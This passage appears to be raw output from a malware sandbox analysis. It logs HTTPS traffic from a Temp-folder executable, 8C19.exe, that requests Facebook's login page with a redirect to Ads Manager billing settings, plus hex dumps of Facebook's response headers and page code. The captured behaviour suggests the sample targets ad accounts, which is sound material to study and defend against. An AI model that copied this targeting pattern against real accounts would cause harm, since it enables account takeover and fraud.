                                                                                                                                  2022-10-17 20:07:20 UTC1058INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  9192.168.2.54971031.13.92.36443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:20 UTC1060OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:20 UTC1060INHTTP/1.1 200 OK
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                                  x-fb-rlafr: 0
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                  2022-10-17 20:07:20 UTC1062INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb
                                                                                                                                  2022-10-17 20:07:20 UTC1063INData Raw: 63 65 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 6d 71 36 6d 4f 76 59 54 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61
                                                                                                                                  Data Ascii: ce2d<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="mq6mOvYT">function envFlush(a){function b(b){for(var c in a)b[c]=a
                                                                                                                                  2022-10-17 20:07:20 UTC1065INData Raw: 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2f 77 65 62 2f 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73
                                                                                                                                  Data Ascii: com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https
                                                                                                                                  2022-10-17 20:07:20 UTC1066INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 53 2f 6c 2f 30 2c 63 72 6f 73 73 2f 74 35 5a 54 68 7a 32 42 34 77 4e 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 4b 41 6a 62 72 6c 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 5f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 76 63 50 71 54 69 52 77 49
                                                                                                                                  Data Ascii: ="https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/t5ZThz2B4wN.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="KAjbrl/" crossorigin="anonymous" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0,cross/vcPqTiRwI
                                                                                                                                  2022-10-17 20:07:20 UTC1068INData Raw: 34 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 62 77 69 7a 57 67 44 61 46 51 75 64 6d 6e 39 77 22 7d 2c 22 31 31 36 37 33 39 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 42 70 4e 2d 74 6c 55 50 77 62 49 49 46 45 33 67 22 7d 2c 22 31 38 35 37 35 38 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 79 54 78 47 4d 70 36 6c 65 30 50 41 74 4f 6b 38 22 7d 2c 22 32 37 37 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 45 75 32 34 34 57 49 63 65 37 69 77 71 70 65 49 22 7d 2c 22 33 37 35 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 65 53 35 55 54 6b
                                                                                                                                  Data Ascii: 40":{"result":false,"hash":"AT5bwizWgDaFQudmn9w"},"1167394":{"result":false,"hash":"AT7BpN-tlUPwbIIFE3g"},"1857581":{"result":false,"hash":"AT5yTxGMp6le0PAtOk8"},"2772":{"result":false,"hash":"AT5Eu244WIce7iwqpeI"},"3752":{"result":false,"hash":"AT6eS5UTk
                                                                                                                                  2022-10-17 20:07:20 UTC1069INData Raw: 67 22 2c 5b 5d 2c 7b 22 63 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 63 70 70 6f 22 3a 7b 22 74 22 3a 38 36 34 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 64 70 72 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 69 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 63 73 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 66 62 6c 5f 73 74 22 3a 7b 22 74 22 3a 33 31 35 33 36 30 30 30 2c 22 73 22 3a 22 53 74 72 69 63 74 22 7d 2c 22 69 5f 75 73 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6c 6f 63 61 6c 65 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6d 5f 6c
                                                                                                                                  Data Ascii: g",[],{"c_user":{"s":"None"},"cppo":{"t":86400,"s":"None"},"dpr":{"t":604800,"s":"None"},"fbl_ci":{"t":31536000,"s":"None"},"fbl_cs":{"t":31536000,"s":"None"},"fbl_st":{"t":31536000,"s":"Strict"},"i_user":{"s":"None"},"locale":{"t":604800,"s":"None"},"m_l
                                                                                                                                  2022-10-17 20:07:20 UTC1071INData Raw: 73 74 5f 62 61 73 65 5f 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 22 2c 22 6d 61 6e 69 66 65 73 74 5f 6f 72 69 67 69 6e 22 3a 6e 75 6c 6c 2c 22 62 65 5f 6f 6e 65 5f 61 68 65 61 64 22 3a 66 61 6c 73 65 2c 22 69 73 5f 72 74 6c 22 3a 66 61 6c 73 65 2c 22 69 73 5f 63 6f 6d 65 74 22 3a 66 61 6c 73 65 2c 22 69 73 5f 65 78 70 65 72 69 6d 65 6e 74 61 6c 5f 74 69 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 5f 6a 69 74 5f 77 61 72 6d 65 64 5f 75 70 22 3a 74 72 75 65 2c 22 68 73 69 22 3a 22 37 31 35 35 35 37 35 34 36 30 32 33 34 37 33 39 36 33 34 22 2c 22 73 65 6d 72 5f 68 6f 73 74 5f 62 75 63 6b 65 74 22 3a 22 33 22 2c 22 62 6c 5f 68 61 73 68 5f 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73 6b 69 70 5f 72 64 5f 62
                                                                                                                                  Data Ascii: st_base_uri":"https:\/\/static.xx.fbcdn.net","manifest_origin":null,"be_one_ahead":false,"is_rtl":false,"is_comet":false,"is_experimental_tier":false,"is_jit_warmed_up":true,"hsi":"7155575460234739634","semr_host_bucket":"3","bl_hash_version":2,"skip_rd_b
                                                                                                                                  2022-10-17 20:07:20 UTC1072INData Raw: 4e 45 53 53 5f 47 52 41 50 48 5f 53 45 54 54 49 4e 47 5f 57 41 42 41 5f 41 53 53 49 47 4e 45 44 5f 55 53 45 52 53 5f 4e 45 57 5f 41 50 49 22 2c 22 41 44 53 5f 50 4c 41 43 45 4d 45 4e 54 5f 46 49 58 5f 50 55 42 4c 49 53 48 45 52 5f 50 4c 41 54 46 4f 52 4d 53 5f 4d 55 54 41 54 49 4f 4e 22 2c 22 46 4f 52 43 45 5f 46 45 54 43 48 5f 42 4f 4f 53 54 45 44 5f 43 4f 4d 50 4f 4e 45 4e 54 5f 41 46 54 45 52 5f 41 44 53 5f 43 52 45 41 54 49 4f 4e 22 2c 22 56 49 44 45 4f 5f 44 49 4d 45 4e 53 49 4f 4e 53 5f 46 52 4f 4d 5f 50 4c 41 59 45 52 5f 49 4e 5f 55 50 4c 4f 41 44 5f 44 49 41 4c 4f 47 22 2c 22 53 4e 49 56 59 5f 47 52 4f 55 50 5f 42 59 5f 45 56 45 4e 54 5f 54 52 41 43 45 5f 49 44 5f 41 4e 44 5f 4e 41 4d 45 22 2c 22 41 44 53 5f 53 54 4f 52 45 5f 56 49 53 49 54 53 5f
                                                                                                                                  Data Ascii: NESS_GRAPH_SETTING_WABA_ASSIGNED_USERS_NEW_API","ADS_PLACEMENT_FIX_PUBLISHER_PLATFORMS_MUTATION","FORCE_FETCH_BOOSTED_COMPONENT_AFTER_ADS_CREATION","VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG","SNIVY_GROUP_BY_EVENT_TRACE_ID_AND_NAME","ADS_STORE_VISITS_
                                                                                                                                  2022-10-17 20:07:20 UTC1074INData Raw: 74 6f 72 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 65 78 70 61 6e 64 6f 4b 65 79 22 3a 22 5f 5f 46 42 5f 53 54 4f 52 45 22 2c 22 75 73 65 45 78 70 61 6e 64 6f 22 3a 74 72 75 65 7d 2c 32 39 31 35 5d 2c 5b 22 43 6f 6f 6b 69 65 43 6f 72 65 4c 6f 67 67 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6d 61 78 69 6d 75 6d 49 67 6e 6f 72 61 62 6c 65 53 74 61 6c 6c 4d 73 22 3a 31 36 2e 36 37 2c 22 73 61 6d 70 6c 65 52 61 74 65 22 3a 39 2e 37 65 2d 35 2c 22 73 61 6d 70 6c 65 52 61 74 65 43 6c 61 73 73 69 63 22 3a 31 2e 30 65 2d 31 30 2c 22 73 61 6d 70 6c 65 52 61 74 65 46 61 73 74 53 74 61 6c 65 22 3a 31 2e 30 65 2d 38 7d 2c 33 34 30 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 49 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b 5d 2c
                                                                                                                                  Data Ascii: toreConfig",[],{"expandoKey":"__FB_STORE","useExpando":true},2915],["CookieCoreLoggingConfig",[],{"maximumIgnorableStallMs":16.67,"sampleRate":9.7e-5,"sampleRateClassic":1.0e-10,"sampleRateFastStale":1.0e-8},3401],["ImmediateImplementationExperiments",[],
                                                                                                                                  2022-10-17 20:07:20 UTC1075INData Raw: 66 65 4b 70 72 6c 55 55 4f 31 51 53 30 6f 45 71 5a 68 30 79 22 2c 22 61 6c 6c 6f 77 6c 69 73 74 65 64 5f 69 66 72 61 6d 65 73 22 3a 5b 5d 7d 2c 35 35 34 30 5d 2c 5b 22 42 69 67 50 69 70 65 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b 5d 2c 7b 22 6c 69 6e 6b 5f 69 6d 61 67 65 73 5f 74 6f 5f 70 61 67 65 6c 65 74 73 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 62 69 67 70 69 70 65 5f 70 6c 75 67 69 6e 73 22 3a 66 61 6c 73 65 7d 2c 39 30 37 5d 2c 5b 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 48 6f 6c 64 6f 75 74 22 2c 5b 5d 2c 7b 22 64 69 73 61 62 6c 65 5f 76 61 72 69 61 74 69 6f 6e 22 3a 66 61 6c 73 65 7d 2c 36 35 33 33 5d 2c 5b 22 41 73 79 6e 63 52 65 71 75 65 73 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 72 65 74 72 79 4f 6e 4e 65 74 77 6f 72 6b 45 72 72 6f
                                                                                                                                  Data Ascii: feKprlUUO1QS0oEqZh0y","allowlisted_iframes":[]},5540],["BigPipeExperiments",[],{"link_images_to_pagelets":false,"enable_bigpipe_plugins":false},907],["IntlVariationHoldout",[],{"disable_variation":false},6533],["AsyncRequestConfig",[],{"retryOnNetworkErro
                                                                                                                                  2022-10-17 20:07:20 UTC1077INData Raw: 73 5f 61 6e 64 72 6f 69 64 2e 6a 73 6f 6e 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 41 70 70 49 6e 76 69 74 65 73 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4f 41 75 74 68 53 68 69 6d 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4c 69 6b 65 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 71 70 5c 2f 69 6e 74 65 72 73 74 69 74 69 61 6c 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 63 6c 6f 73 65 5c 2f 22 3a 31
                                                                                                                                  Data Ascii: s_android.json":0,"\/connect\/jsdialog\/MPlatformAppInvitesJSDialog\/":0,"\/connect\/jsdialog\/MPlatformOAuthShimJSDialog\/":0,"\/connect\/jsdialog\/MPlatformLikeJSDialog\/":0,"\/qp\/interstitial\/":1,"\/qp\/action\/redirect\/":1,"\/qp\/action\/close\/":1
                                                                                                                                  2022-10-17 20:07:20 UTC1078INData Raw: 65 72 5c 2f 22 3a 31 2c 22 5c 2f 63 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 65 67 61 6c 5c 2f 74 65 72 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 61 63 63 6f 75 6e 74 5c 2f 22 3a 31 2c 22 5c 2f 6e 5c 2f 22 3a 31 2c 22 5c 2f 72 65 6d 6f 74 65 5f 74 65 73 74 5f 64 65 76 69 63 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 63 6f 6e 66 69 72 6d 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 72 65 73 75 6c 74 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 70 72 6f 6d 6f 73 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 63 6f 6e 74 69 6e 75 65 5c 2f 22 3a 31 2c 22
                                                                                                                                  Data Ascii: er\/":1,"\/cr.php":1,"\/legal\/terms\/":1,"\/login.php":1,"\/login\/":1,"\/mobile\/account\/":1,"\/n\/":1,"\/remote_test_device\/":1,"\/upsell\/buy\/":1,"\/upsell\/buyconfirm\/":1,"\/upsell\/buyresult\/":1,"\/upsell\/promos\/":1,"\/upsell\/continue\/":1,"
                                                                                                                                  2022-10-17 20:07:20 UTC1079INData Raw: 75 72 6e 20 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 2e 4e 55 4d 42 45 52 5f 4f 54 48 45 52 3b 20 7d 22 7d 2c 33 34 30 35 5d 2c 5b 22 53 65 72 76 65 72 54 69 6d 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 73 65 72 76 65 72 54 69 6d 65 22 3a 31 36 36 36 30 33 37 32 34 30 34 34 34 2c 22 74 69 6d 65 4f 66 52 65 71 75 65 73 74 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 34 30 34 32 35 2e 35 2c 22 74 69 6d 65 4f 66 52 65 73 70 6f 6e 73 65 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 34 30 34 32 35 2e 35 7d 2c 35 39 34 33 5d 2c 5b 22 46 62 74 51 54 4f 76 65 72 72 69 64 65 73 22 2c 5b 5d 2c 7b 22 6f 76 65 72 72 69 64 65 73 22 3a 7b 7d 7d 2c 35 35 31 5d 2c 5b 22 41 6e 61 6c 79 74 69 63 73 43 6f 72 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 64 65 76 69 63 65 5f 69 64 22 3a 22
                                                                                                                                  Data Ascii: urn IntlVariations.NUMBER_OTHER; }"},3405],["ServerTimeData",[],{"serverTime":1666037240444,"timeOfRequestStart":1666037240425.5,"timeOfResponseStart":1666037240425.5},5943],["FbtQTOverrides",[],{"overrides":{}},551],["AnalyticsCoreData",[],{"device_id":"
                                                                                                                                  2022-10-17 20:07:20 UTC1081INData Raw: 68 35 44 44 31 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 39 36 34 36 32 22 2c 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 32 52 72 53 4b 57 75 50 35 63 73 67 69 2d 51 43 74 37 37 72 53 36 64 6e 73 30 6b 47 74 66 30 6b 49 36 7a 70 65 71 6c 38 34 78 72 68 49 47 31 4e 56 36 71 79 68 47 4d 6c 54 70 76 33 4e 51 76 58 66 44 62 72 43 55 75 4a 56 47 53 54 77 44 5a 56 52 54 6b 68 35 44 44 31 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 36 36 33 33 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22
                                                                                                                                  Data Ascii: h5DD1A"]},-1],["cr:896462",["setIntervalAcrossTransitionsBlue"],{"__rc":["setIntervalAcrossTransitionsBlue","Aa2RrSKWuP5csgi-QCt77rS6dns0kGtf0kI6zpeql84xrhIG1NV6qyhGMlTpv3NQvXfDbrCUuJVGSTwDZVRTkh5DD1A"]},-1],["cr:986633",["setTimeoutAcrossTransitionsBlue"
                                                                                                                                  2022-10-17 20:07:20 UTC1082INData Raw: 73 65 6f 76 65 72 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 6f 75 74 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 77 68 65 65 6c 22 3a 31 2c 22 4d 53 50 6f 69 6e 74 65 72 4d 6f 76 65 22 3a 31 30 30 30 30 2c 22 6b 65 79 64 6f 77 6e 22 3a 30 2e 31 2c 22 63 6c 69 63 6b 22 3a 30 2e 30 32 2c 22 6d 6f 75 73 65 75 70 22 3a 30 2e 30 32 2c 22 5f 5f 31 30 30 6d 73 22 3a 30 2e 30 30 31 2c 22 5f 5f 64 65 66 61 75 6c 74 22 3a 35 30 30 30 2c 22 5f 5f 6d 69 6e 22 3a 31 30 30 2c 22 5f 5f 69 6e 74 65 72 61 63 74 69 6f 6e 44 65 66 61 75 6c 74 22 3a 32 30 30 2c 22 5f 5f 65 76 65 6e 74 44 65 66 61 75 6c 74 22 3a 31 30 30 30 30 30 7d 2c 22 70 61 67 65 5f 73 61 6d 70 6c 69 6e 67 5f 62 6f 6f 73 74 22 3a 31 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 72 65 67 65 78 65 73 22 3a 7b 7d
                                                                                                                                  Data Ascii: seover":10000,"mouseout":10000,"mousewheel":1,"MSPointerMove":10000,"keydown":0.1,"click":0.02,"mouseup":0.02,"__100ms":0.001,"__default":5000,"__min":100,"__interactionDefault":200,"__eventDefault":100000},"page_sampling_boost":1,"interaction_regexes":{}
                                                                                                                                  2022-10-17 20:07:20 UTC1084INData Raw: 2d 20 5f 39 61 78 5f 20 5f 39 61 79 31 20 55 49 50 61 67 65 5f 4c 6f 67 67 65 64 4f 75 74 20 68 61 73 42 61 6e 6e 65 72 20 5f 2d 6b 62 20 5f 36 30 35 61 20 62 5f 63 33 70 79 6e 2d 61 68 68 20 63 68 72 6f 6d 65 20 77 65 62 6b 69 74 20 77 69 6e 20 78 31 20 4c 6f 63 61 6c 65 5f 65 6e 5f 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 6d 71 36 6d 4f 76 59 54 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 62 6f 6f 74 73 74 72 61 70 57 65 62 53 65 73 73 69 6f 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 6a 28 31 36 36 36 30 33 37 32 34 30 29 7d 29 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 6c 69 22 20 69 64 3d 22 75 5f 30 5f 30
